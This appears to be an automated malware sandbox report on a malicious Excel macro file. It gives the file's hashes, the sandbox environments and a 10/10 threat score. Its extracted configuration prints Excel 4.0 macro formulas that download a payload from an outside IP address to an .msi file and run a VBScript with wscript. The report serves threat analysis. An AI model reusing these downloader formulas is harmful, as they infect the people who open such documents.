General
-
Target
23b60bc9f3011bbce0be570e648c6947
-
Size
6KB
-
Sample
231221-3b9ezscca5
-
MD5
23b60bc9f3011bbce0be570e648c6947
-
SHA1
4ca22d40c35557d945f9b76c998b63e451bcf3a4
-
SHA256
b298bb3c10ec85aa080cc23184c1fc736d61179c6a4f614cc5a6b1a6b3647685
-
SHA512
cebfc71e0558448e55d4daeff9e25af4d8c1fac915d3a73825f411430e73280b6ca41d6a1cb544a504596724d7f0e9ea8d5799965e486e12af63f5a180c9bdd9
-
SSDEEP
192:NDSluSXbrA2OmmfR68UhHFBFYukb98yDb+m:NmuoM2ww1FYdb98yDl
Static task
static1
Behavioral task
behavioral1
Sample
23b60bc9f3011bbce0be570e648c6947.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
23b60bc9f3011bbce0be570e648c6947.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
=EXEC("wscript C:\zer\spp.vbs")
=HALT()
Targets
-
-
Target
23b60bc9f3011bbce0be570e648c6947
Score
10/10
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-